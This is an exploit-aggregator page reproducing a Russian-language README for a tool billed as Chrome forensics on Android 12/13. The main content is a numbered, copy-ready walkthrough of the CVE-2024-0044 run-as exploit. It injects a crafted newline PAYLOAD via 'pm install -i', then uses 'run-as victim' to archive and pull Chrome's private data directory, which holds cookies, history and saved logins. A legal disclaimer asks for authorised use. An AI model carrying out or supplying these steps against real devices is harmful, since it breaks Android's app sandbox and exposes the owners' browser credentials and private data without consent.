Sploitus

Exploit for Chrome-Forensic_CVE-2024-0044

kitploit · 2026-08-27

Exploit Code

MARKDOWN210 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-JACKTEKNO-CHROME-FORENSIC_CVE-2024-0044
# 🔍 Chrome Forensic - CVE-2024-0044

![Version](https://img.shields.io/badge/version-1.0.0-blue.svg) ![Python](https://img.shields.io/badge/python-3.x-brightgreen.svg) ![License](https://img.shields.io/badge/license-Educational-orange.svg) ![Platform](https://img.shields.io/badge/platform-Android%2012%7C13-lightgrey.svg)

**Мощный инструмент цифровой криминалистики для извлечения и анализа артефактов Google Chrome с устройств Android**

Возможности • Установка • Использование • Документация

* * *

## 👤 Информация об авторе

**Автор:** JackTekno  
**GitHub:** github.com/JackTekno

* * *

## 📋 Обзор

Этот инструмент использует уязвимость **CVE-2024-0044** (Run-as) для обхода ограничений прав доступа на нерутированных устройствах Android 12/13, что позволяет выполнять криминалистическое извлечение данных Google Chrome. Инструмент анализирует сырые базы данных SQLite и формирует комплексные отчёты.

## 🔄 Процесс работы

![Блок-схема криминалистического анализа](https://assets.kitploit.com/production/public/readmes/36905/b558cbfd8703ad2c1d7beaee20b92def80a65b20607f6b117e817cdc50bcf0a9.png)

_Полный рабочий процесс криминалистического анализа от сбора данных до формирования отчета_

* * *

## 📊 Возможности и вывод

Инструмент генерирует подробный отчёт в формате Excel (`result_chrome_forensic.xlsx`) со следующими листами:

* * *

## 🛠️ Предварительные требования

### Требования к оборудованию

  * 📱 Телефон Android (Android 12/13)
  * 💻 ПК (Linux/Windows/Mac)



### Тестированная среда

  * 🐧 ОС: Linux UOS 20 Professional



### Требования к ПО

  * 🐍 Python 3.x
  * 📲 ADB (Android Debug Bridge)
  * 📦 Файл Dummy APK (например, `F-Droid.apk`)



* * *

## 🚀 Установка

  1. **Клонировать репозиторий**

root@kitploit:~
         
         git clone https://github.com/JackTekno/Chrome-Forensic_CVE-2024-0044.git
         cd Chrome-Forensic_CVE-2024-0044
         

  2. **Установить зависимости**

root@kitploit:~
         
         pip install -r requirements.txt
         




* * *

## 🔓 Руководство по сбору данных

### Шаг 1: Подготовка устройства

  1. Перейдите в **Настройки → О телефоне**
  2. Нажмите **Номер сборки** 7 раз, чтобы включить режим разработчика
  3. Перейдите в **Настройки → Система → Параметры разработчика**
  4. Включите **Отладку по USB**
  5. Подключите телефон к ПК через USB и подтвердите подключение



### Шаг 2: Подготовка эксплойта

root@kitploit:~
    
    
    # Поместите фиктивный APK во временную папку
    adb push F-Droid.apk /data/local/tmp/base.apk
    

### Шаг 3: Найдите целевой UID

root@kitploit:~
    
    
    adb shell pm list packages -U | grep com.android.chrome
    # Пример вывода: package:com.android.chrome uid:10129
    # Запомните UID (например, 10129)
    

### Шаг 4: Выполнение эксплойта

> ⚠️ Замените `10129` на фактический UID Chrome из шага 3

root@kitploit:~
    
    
    adb shell
    
    # Внутри оболочки ADB:
    PAYLOAD="@null
    victim 10129 1 /data/user/0 default:targetSdkVersion=28 none 0 0 1 @null"
    
    # Запустите менеджер пакетов
    pm install -i "$PAYLOAD" /data/local/tmp/base.apk
    

### Шаг 5: Извлечение данных

root@kitploit:~
    
    
    # Всё ещё внутри оболочки ADB
    run-as victim tar -cf - /data/data/com.android.chrome/ | cat > /data/local/tmp/chrome.tar
    
    # Выйти из оболочки ADB
    exit
    

### Шаг 6: Скачать данные на ПК

root@kitploit:~
    
    
    adb pull /data/local/tmp/chrome.tar .
    

### Шаг 7: Распаковать данные

Распакуйте файл 'chrome.tar' в папке проекта. Вручную перемещать файлы не нужно. Python-скрипт автоматически найдёт файлы баз данных внутри распакованных папок.

root@kitploit:~
    
    
    tar -xf chrome.tar
    

* * *

## 💻 Использование

Запустите инструмент криминалистического анализа:

root@kitploit:~
    
    
    python3 chrome_forensic.py
    

Инструмент проанализирует файлы баз данных и создаст `result_chrome_forensic.xlsx` в той же директории.

* * *

## ⚖️ Юридическое предупреждение

> **⚠️ ВАЖНО:** Этот инструмент предназначен **только для образовательных целей и авторизованного криминалистического анализа**.
> 
>   * Используйте только на устройствах, которые вам принадлежат или на анализ которых вы имеете явное письменное разрешение.
>   * Несанкционированный доступ к цифровым устройствам может нарушать законы вашей юрисдикции.
>   * Авторы не несут ответственности за неправомерное использование данного инструмента.
> 


* * *

## 🤝 Вклад

Приветствуются любые вклады! Пожалуйста, не стесняйтесь отправлять Pull Request.

* * *

## 📄 Лицензия

Этот проект лицензирован под GNU General Public License v3.0. См. файл LICENSE для получения подробной информации.

* * *

## 👤 Благодарности

Доказательство концепции метода сбора было обобщено и опубликовано Tinyhack.com.

* * *

**Сделано с ❤️ от JackTekno**

⭐ Поставить звезду • 🐛 Сообщить об ошибке • 💡 Запросить функцию